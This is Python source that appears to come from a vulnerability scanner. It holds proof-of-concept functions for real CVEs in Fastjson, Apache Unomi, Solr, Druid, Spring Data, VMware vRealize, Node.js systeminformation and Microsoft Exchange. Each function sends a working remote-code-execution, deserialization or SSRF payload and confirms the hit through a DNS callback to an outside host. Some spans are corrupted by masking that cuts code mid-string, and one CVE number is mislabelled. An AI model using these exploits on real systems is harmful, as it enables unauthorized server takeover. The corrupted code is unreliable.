def fastjson_1224_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Fastjson: 1.2.24" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_payd"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_name"] = "Fastjson 反序列化远程代码执行漏洞" self.vul_info["vul_numb"] = "CVE-2017-18349" self.vul_info["vul_apps"] = "Fastjson" self.vul_info["vul_date"] = "2017-03-15" self.vul_info["vul_vers"] = "<= 1.2.24" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "远程代码执行" self.vul_info["vul_data"] = "null" self.vul_info[ "vul_desc"] = "Fastjson中的parseObject允许远程攻击者通过精心制作的JSON请求执行任意代码" self.vul_info["cre_date"] = "2021-01-20" self.vul_info["cre_auth"] = "zhzyker" headers = { 'User-Agent': self.ua, 'Content-Type': "application/json", 'Connection': 'close' } md = dns_request() dns = md data = { "b": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://" + dns + "//Exploit", "autoCommit": True } } data = json.dumps(data) try: try: request = requests.post(self.url, data=data, headers=headers, timeout=self.timeout, verify=False) self.vul_info["vul_data"] = dump.dump_all(request).decode( 'utf-8', 'ignore') except: pass if dns_result(md): self.vul_info["vul_payd"] = "ldap://" + dns + "//Exploit] " self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info[ "prt_info"] = "[dns] [payload: ldap://" + dns + "//Exploit] " verify.scan_print(self.vul_info) else: verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as e: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def fastjson(self, webapps_identify, url): name = "Fastjson" Identify.identify_prt(name) dns = dns_request() payload1 = '{"e":{"@type":"java.net.Inet4Address","val":"%s"}}' %dns payload2 = '{"@type":"java.net.Inet4Address","val":"%s"}' %dns payload3 = '{{"@type":"java.net.URL","val":"http://%s"}:"x"}' %dns payload4 = '{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"%s"}}""}' %dns payload5 = '{"a":"' headers = {'User-Agent': self.ua, 'Content-Type': "application/json", 'Connection': 'close'} try: try: request = requests.post(url, data=payload5, headers=headers, timeout=self.timeout, verify=False) except: pass if r"nested exception is com.alibaba.fastjson.JSONException:" in request.text: if r"application/json" == request.headers['Content-Type']: webapps_identify.append("fastjson") elif r"application/json" in request.headers['Content-Type']: webapps_identify.append("fastjson") else: requests.post(url, data=payload1, headers=headers, timeout=self.timeout, verify=False) requests.post(url, data=payload2, headers=headers, timeout=self.timeout, verify=False) requests.post(url, data=payload3, headers=headers, timeout=self.timeout, verify=False) requests.post(url, data=payload4, headers=headers, timeout=self.timeout, verify=False) if dns_result(dns): webapps_identify.append("fastjson") webapps_identify.append("fastjson [" + dns + "]") except Exception as error: pass
def cve_2020_13942_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Apache Unomi: CVE-2020-13942" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = self.payload_cve_2020_13942.replace( "RECOMMAND", "whoami") self.vul_info["vul_name"] = "Apache Unomi remote code execution" self.vul_info["vul_numb"] = "CVE-2020-13942" self.vul_info["vul_apps"] = "Unomi" self.vul_info["vul_date"] = "2020-11-23" self.vul_info["vul_vers"] = "< 1.5.2" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "远程代码执行" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "攻击者可以通过精心构造的MVEL或ONGl表达式来发送恶意请求,使得Unomi服务器执行任意代码," \ "漏洞对应编号为CVE-2020-11975,而CVE-2020-13942漏洞是对CVE-2020-11975漏洞的补丁绕过," \ "攻击者绕过补丁检测的黑名单,发送恶意请求,在服务器执行任意代码。" self.vul_info["cre_date"] = "2021-01-28" self.vul_info["cre_auth"] = "zhzyker" md = dns_request() cmd = "ping " + md self.payload = self.payload_cve_2020_13942.replace("RECOMMAND", cmd) self.headers = { 'User-Agent': self.ua, 'Accept': '*/*', 'Connection': 'close', 'Content-Type': 'application/json' } try: req = requests.post(self.url + "/context.json", data=self.payload, headers=self.headers, timeout=self.timeout, verify=False) if dns_result(md): self.vul_info["vul_data"] = dump.dump_all(req).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["prt_info"] = "[dns] [cmd:" + cmd + "]" else: rep = list( json.loads(req.text) ["trackedConditions"])[0]["parameterValues"]["pagePath"] if r"/tracker/" in rep: self.vul_info["vul_data"] = dump.dump_all(req).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoC_MaYbE" self.vul_info["prt_info"] = "[maybe]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as error: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2021_27905_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Apache Solr: CVE-2021-27905" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "Apache Solr Replication handler SSRF" self.vul_info["vul_numb"] = "CVE-2021-27905" self.vul_info["vul_apps"] = "Solr" self.vul_info["vul_date"] = "2021-04-14" self.vul_info["vul_vers"] = "7.0.0-7.7.3, 8.0.0-8.8.1" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "SSRF" self.vul_info["vul_data"] = "null" self.vul_info[ "vul_desc"] = "Apache Solr是一个开源搜索服务引擎,Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。漏洞产生在 ReplicationHandler 中的 masterUrl 参数( leaderUrl 参数)可指派另一个 Solr 核心上的 ReplicationHandler 讲索引数据复制到本地核心上。成功利用此漏洞可造成服务端请求伪造漏洞。" self.vul_info["cre_auth"] = "zhzyker" core_name = None dns = dns_request() url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json" try: request = requests.get(url_core, headers=self.headers, timeout=self.timeout, verify=False) try: core_name = list(json.loads(request.text)["status"])[0] except: pass payload = "/solr/re_core_name/replication?command=fetchindex&masterUrl" \ "=http://re_dns_domain/&wt=json&httpBasicAuthUser="******"&httpBasicAuthPassword="******"re_core_name", core_name).replace("re_dns_domain", dns) url_ssrf = urljoin(self.url, payload) r = requests.get(url_ssrf, headers=self.headers, timeout=self.timeout, verify=False) if dns in dns_result(dns): self.vul_info["vul_payd"] = url_ssrf self.vul_info["vul_data"] = dump.dump_all(r).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info[ "prt_info"] = "[ssrf] [dns] [corename: " + self.url + "/solr/" + core_name + " ]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as e: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def fastjson_1262_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Fastjson: 1.2.62" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_payd"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_name"] = "Fastjson 反序列化远程代码执行漏洞" self.vul_info["vul_numb"] = "null" self.vul_info["vul_apps"] = "Fastjson" self.vul_info["vul_date"] = "2019-10-07" self.vul_info["vul_vers"] = "<= 1.2.62" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "远程代码执行" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "官方暂未发布针对此漏洞的修复版本,开启了autoType功能的受影响用户可通过关闭autoType来规避风险" \ "(autoType功能默认关闭),另建议将JDK升级到最新版本。" self.vul_info["cre_date"] = "2021-01-21" self.vul_info["cre_auth"] = "zhzyker" headers = {'User-Agent': self.ua, 'Content-Type': "application/json"} md = dns_request() dns = md data = { "@type": "org.apache.xbean.propertyeditor.JndiConverter", "AsText": "ldap://" + dns + "//exploit" } data = json.dumps(data) try: try: request = requests.post(self.url, data=data, headers=headers, timeout=self.timeout, verify=False) self.vul_info["vul_data"] = dump.dump_all(request).decode( 'utf-8', 'ignore') except: pass if dns_result(md): self.vul_info["vul_payd"] = "ldap://" + dns + "//Exploit] " self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info[ "prt_info"] = "[dns] [payload: ldap://" + dns + "//Exploit] " verify.scan_print(self.vul_info) else: verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as e: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2021_25646_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Apache Druid: CVE-2021-25646" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "Apache Druid 远程代码执行漏洞" self.vul_info["vul_numb"] = "CVE-2021-25646" self.vul_info["vul_apps"] = "Druid" self.vul_info["vul_date"] = "2021-02-01" self.vul_info["vul_vers"] = "< 0.20.1" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "远程代码执行漏洞" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。" \ "此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中," \ "经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。" \ "攻击者可直接构造恶意请求执行任意代码,控制服务器。" self.vul_info["cre_date"] = "2021-02-03" self.vul_info["cre_auth"] = "zhzyker" url = urljoin(self.url, "/druid/indexer/v1/sampler") headers = { 'Content-Type': 'application/json', 'User-Agent': self.ua, 'Accept': 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2', 'Connection': 'keep-alive' } md = dns_request() cmd = "ping " + md data = self.payload_cve_2021_25646.replace("RECOMMAND", cmd) try: request = requests.post(url, data=data, headers=headers, timeout=self.timeout, verify=False) if dns_result(md): self.vul_info["vul_data"] = dump.dump_all(request).decode( 'utf-8', 'ignore') self.vul_info["vul_payd"] = data self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["prt_info"] = "[dns] [rce] [cmd: " + cmd + "]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as e: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2021_21975_poc(self): self.threadLock.acquire() self.vul_info[ "prt_name"] = "VMware vRealize Operations Manager: CVE-2021-21975" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info[ "vul_name"] = "VMware vRealize Operations Manager API SSRF" self.vul_info["vul_numb"] = "CVE-2021-21972" self.vul_info["vul_apps"] = "Vmware" self.vul_info["vul_date"] = "2021-03-31" self.vul_info["vul_vers"] = "<= 8.3.0" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "SSRF" self.vul_info["vul_data"] = "null" self.vul_info[ "vul_desc"] = "攻击者通过访问vRealize Operations Manager API传递特定的参数到服务器端进行请求伪造攻击" self.vul_info["cre_date"] = "2021-04-01" self.vul_info["cre_auth"] = "zhzyker" try: headers = { "User-Agent": self.ua, "Content-Type": "application/json;charset=UTF-8" } dns = dns_request() data = '["' + dns + '"]' url = urljoin(self.url, "/casa/nodes/thumbprints") res = requests.post(url, data=data, headers=headers, timeout=self.timeout, verify=False) if dns_result(dns): self.vul_info["vul_data"] = dump.dump_all(res).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["vul_payd"] = data self.vul_info["prt_info"] = "[ssrf] [dns:" + dns + " ]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as error: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2021_21315_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Node.JS: CVE-2021-21315" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "Node.JS Command Injection" self.vul_info["vul_numb"] = "CVE-2021-21315" self.vul_info["vul_apps"] = "Node.JS" self.vul_info["vul_date"] = "2021-02-25" self.vul_info["vul_vers"] = "Systeminformation < 5.3.1" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "Command Injection" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "CVE-2021-21315 Node.JS OS sanitize service Parameters Command Injection" self.vul_info["cre_date"] = "2021-03-04" self.vul_info["cre_auth"] = "zhzyker" headers = { "User-agent": self.ua, "Connection": "close" } md = dns_request() cmd = "ping%20" + md payload = "/api/getServices?name[]=$(RECOMMAND)".replace("RECOMMAND", cmd) url = self.url + payload try: try: req = requests.get(url, headers=headers, timeout=3, verify=False) r = dump.dump_all(req).decode('utf-8', 'ignore') except: r = "null" pass if dns_result(md): self.vul_info["vul_data"] = r self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["vul_payd"] = payload self.vul_info["prt_info"] = "[dns] [payload:" + url + " ]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as error: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2018_1273_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Spring Data: CVE-2018-1273" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "Spring Data Commons 远程命令执行漏洞" self.vul_info["vul_numb"] = "CVE-2018-1273" self.vul_info["vul_apps"] = "Spring" self.vul_info["vul_date"] = "2018-04-11" self.vul_info["vul_vers"] = "1.13 - 1.13.10, 2.0 - 2.0.5" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "远程命令执行漏洞" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "Spring Data Commons组件中存在远程代码执行漏洞," \ "攻击者可构造包含有恶意代码的SPEL表达式实现远程代码攻击,直接获取服务器控制权限。" self.vul_info["cre_date"] = "2021-01-26" self.vul_info["cre_auth"] = "zhzyker" md = dns_request() cmd = "ping " + md payload = 'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("' + cmd + '")]=&password=&repeatedPassword='******'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["vul_payd"] = payload self.vul_info["prt_info"] = "[dns] [rce] [payload: " + payload + " ]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as e: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2017_12629_poc(self): self.threadLock.acquire() http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0' self.vul_info["prt_name"] = "Apache Solr: CVE-2017-12629" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_payd"] = self.payload_cve_2017_12629.replace( "RECOMMAND", "whoami") self.vul_info["vul_urls"] = self.url self.vul_info["vul_name"] = "Apache Solr 远程代码执行漏洞" self.vul_info["vul_numb"] = "CVE-2017-12629" self.vul_info["vul_apps"] = "Solr" self.vul_info["vul_date"] = "2017-10-14" self.vul_info["vul_vers"] = "< 7.1.0" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "Remote Code Execution" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "Apache Solr 是Apache开发的一个开源的基于Lucene的全文搜索服务器。其集合的配置方法" \ "(config路径)可以增加和修改监听器,通过RunExecutableListener执行任意系统命令。" self.vul_info["cre_auth"] = "zhzyker" core_name = "null" new_core = random_md5() md = dns_request() cmd = "ping " + md payload1 = self.payload_cve_2017_12629.replace( "RECOMMAND", cmd).replace("new_core", new_core) payload2 = '[{"id": "test"}]' url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json" headers_solr1 = { 'Accept': "*/*", 'User-Agent': self.ua, 'Content-Type': "application/json" } headers_solr2 = { 'Host': "localhost", 'Accept-Language': "en", 'User-Agent': self.ua, 'Connection': "close", 'Content-Type': "application/json" } try: request = requests.get(url_core, headers=headers_solr1, timeout=self.timeout, verify=False) try: core_name = list(json.loads(request.text)["status"])[0] except: pass req = requests.post(self.url + "/solr/" + str(core_name) + "/config", data=payload1, headers=headers_solr1, timeout=self.timeout, verify=False) if dns_result(md): self.vul_info["vul_data"] = dump.dump_all(req).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info[ "prt_info"] = "[dns] [newcore: " + new_core + "] " else: if request.status_code == 200 and core_name != "null" and core_name is not None: self.vul_info["vul_data"] = dump.dump_all(req).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoC_MaYbE" self.vul_info[ "prt_info"] = "[maybe] [newcore: " + new_core + "] " verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2019_17558_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Apache Solr: CVE-2019-17558" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = self.payload_cve_2019_17558.replace( "RECOMMAND", "whoami") self.vul_info[ "vul_name"] = "Apache Solr Velocity template Remote Code Execution" self.vul_info["vul_numb"] = "CVE-2019-17558" self.vul_info["vul_apps"] = "Solr" self.vul_info["vul_date"] = "2017-10-16" self.vul_info["vul_vers"] = "5.0.0 - 8.3.1" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "Remote Code Execution" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "用户可以注入自定义模板,通过Velocity模板语言执行任意命令。" self.vul_info["cre_auth"] = "zhzyker" core_name = None md = dns_request() cmd = "ping " + md payload_2 = self.payload_cve_2019_17558.replace("RECOMMAND", cmd) url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json" try: request = requests.get(url_core, headers=self.headers, timeout=self.timeout, verify=False) try: core_name = list(json.loads(request.text)["status"])[0] except: pass url_api = self.url + "/solr/" + str(core_name) + "/config" headers_json = { 'Content-Type': 'application/json', 'User-Agent': self.ua } set_api_data = """ { "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true" } } """ try: r = requests.post(url_api, data=set_api_data, headers=headers_json, timeout=self.timeout, verify=False) req = requests.get(self.url + "/solr/" + str(core_name) + payload_2, headers=self.headers, timeout=self.timeout, verify=False) req = dump.dump_all(req).decode('utf-8', 'ignore') r = dump.dump_all(r).decode('utf-8', 'ignore') except: req = "timeout" r = "timeout" if dns_result(md): self.vul_info["vul_data"] = req self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info[ "prt_info"] = "[dns] [corename: " + self.url + "/solr/" + core_name + " ]" verify.scan_print(self.vul_info) elif self.vul_info[ "prt_resu"] != "PoCSuCCeSS" and core_name is not None: self.vul_info["vul_data"] = r self.vul_info["prt_resu"] = "PoC_MaYbE" self.vul_info[ "prt_info"] = "[maybe] [corename: " + self.url + "/solr/" + core_name + " ]" verify.scan_print(self.vul_info) else: verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as e: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2021_26855_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Microsoft Exchange: CVE-2021-26855" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "Microsoft Exchange Server SSRF" self.vul_info["vul_numb"] = "CVE-2021-26855" self.vul_info["vul_apps"] = "Exchange" self.vul_info["vul_date"] = "2021-03-03" self.vul_info["vul_vers"] = "Exchange Server 2010 2013 2016 2019" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "SSRF" self.vul_info["vul_data"] = "null" self.vul_info[ "vul_desc"] = "Exchange 中身份验证后的任意文件写入漏洞。攻击者可以通过 Exchange 服务器进行身份验证,同时可以利用漏洞将文件写入服务器上的任何路径。也可以通过利用 CVE-2021-26855 SSRF 漏洞或通过破坏合法管理员的凭据来进行身份验证。" self.vul_info["cre_date"] = "2021-03-07" self.vul_info["cre_auth"] = "zhzyker" url = self.url + "/owa/auth/x.js" dns = dns_request() cookie_local = "X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;" cookie_dns = "X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;".replace( "localhost", dns) try: headers = { "User-agent": self.ua, "Cookie": cookie_dns, "Connection": "close" } res = requests.get(url, headers=headers, timeout=self.timeout, verify=False) if dns_result(dns): self.vul_info["vul_data"] = dump.dump_all(res).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["vul_payd"] = headers["Cookie"] self.vul_info["prt_info"] = "[ssrf] [dns] [cookie: " + headers[ "Cookie"] + "]" else: headers = { "User-agent": self.ua, "Cookie": cookie_local, "Connection": "close" } res = requests.get(url, headers=headers, timeout=self.timeout, verify=False) if res.status_code == 500 and "NegotiateSecurityContext failed with for host" in res.text: if r"TargetUnknown" in res.text and r"localhost" in res.text: self.vul_info["vul_data"] = dump.dump_all(res).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoC_MaYbE" self.vul_info["vul_payd"] = headers["Cookie"] self.vul_info[ "prt_info"] = "[ssrf] [maybe] [cookie: " + headers[ "Cookie"] + "]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as error: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()